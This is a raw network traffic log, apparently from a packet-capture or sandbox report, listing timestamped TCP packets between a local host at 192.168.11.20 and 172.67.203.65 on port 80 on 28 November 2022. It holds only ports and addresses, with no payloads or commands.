Nov 28, 2022 12:46:57.970716000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.970726967 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.970761061 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.970772028 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.970773935 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.970782042 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.970793009 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.970814943 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.970825911 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.970865965 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.970877886 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.970907927 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.970918894 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971024990 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.971126080 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971137047 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971143007 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.971151114 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971163034 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971229076 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971241951 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.971285105 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971296072 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971306086 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971317053 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971329927 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971368074 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.971415043 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.971472025 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971503019 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.971532106 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971543074 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971554041 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971565008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971575975 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971586943 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971597910 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971609116 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971621990 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971673012 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.971726894 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.971775055 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.971779108 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971791029 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971801996 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971812963 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971826077 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971837997 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971848965 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971882105 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971893072 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971904039 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971915007 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971930027 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971940994 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971951008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971961975 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971981049 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.971992016 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972002983 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972013950 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972014904 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.972043037 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972054958 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972064972 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972069979 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.972069979 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.972075939 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972086906 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972141027 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972151995 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972162962 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972224951 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972280025 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972290993 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972301006 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972312927 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.972312927 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.972335100 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972361088 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972371101 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972382069 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972393036 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972403049 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972436905 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972448111 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972455978 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.972459078 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972470999 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972493887 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972505093 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972516060 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972518921 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.972548962 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972559929 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972570896 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972582102 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972592115 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972644091 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972654104 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.972655058 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972666025 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972676039 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972687006 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972697973 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972708941 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972718954 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972743988 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.972748041 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972759008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972770929 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972800016 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972810984 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972821951 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972832918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972847939 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972858906 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972878933 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.972907066 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972918034 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.972986937 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.973016977 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973027945 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973038912 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973050117 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973061085 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973072052 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973104000 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.973110914 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973121881 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973133087 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973160982 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973171949 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973182917 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973192930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973212957 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973223925 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973233938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973263979 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973274946 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973310947 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.973371983 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973373890 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.973383904 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973424911 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973436117 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973447084 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973458052 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973474979 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973481894 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.973489046 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973531008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973541975 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973551989 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973562956 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973573923 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973592997 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973635912 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.973647118 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973658085 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973670006 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973681927 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973704100 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973715067 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973716974 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.973726034 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973752975 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973763943 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973774910 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973800898 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973812103 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.973826885 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.973877907 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.974001884 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.974013090 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.974055052 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.974066973 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.974077940 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.974087954 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.974292040 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.978072882 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.978219986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.978230953 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.978241920 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.978252888 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.978364944 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.978431940 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.021800041 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.034045935 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034153938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034167051 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034178972 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034216881 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.034239054 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034250975 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034261942 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034274101 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034286022 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034298897 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.034324884 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034337044 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034348011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034359932 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034372091 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034387112 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.034389019 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034413099 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034429073 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034440994 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.034441948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034454107 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034466028 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034532070 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.034569025 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034580946 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034593105 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034604073 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034615993 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034626961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034638882 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034650087 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034663916 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034676075 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034677982 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.034687996 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034869909 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.034909010 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034920931 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034933090 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034945011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034955978 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034967899 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034979105 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.034991026 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035002947 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035017014 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035017967 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.035028934 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035041094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035053015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035064936 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035074949 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035087109 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035099030 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035110950 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035121918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035134077 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035145998 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035157919 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035168886 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035181046 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035192966 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035226107 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.035274982 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.035307884 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035320997 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035331964 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035346031 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035357952 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035370111 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035381079 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035393000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035403967 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035408974 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.035415888 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035427094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035439014 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035449982 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035460949 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035473108 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035485029 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035495996 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035552025 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.035552979 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035564899 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035582066 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035594940 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035600901 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.035607100 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035619974 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035633087 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035644054 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035655022 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035667896 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035681009 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035692930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035703897 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035708904 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.035716057 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035727978 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035738945 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035751104 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035762072 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035773993 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035784960 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035797119 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035809040 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035820007 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035831928 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035844088 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035856962 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035870075 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035881042 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035888910 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.035892963 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035904884 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035916090 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035928011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035938978 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035950899 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035963058 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035969973 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.035974026 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035985947 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.035996914 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036009073 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036020994 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036031961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036043882 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036058903 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036072969 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036084890 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036097050 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036113024 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036124945 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036137104 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036149025 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036163092 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036168098 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.036175013 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036186934 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036197901 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036210060 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036221981 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036232948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036245108 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036256075 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036267042 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.036267996 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036279917 CET	80	49836	172.67.203.65	192.168.11.20
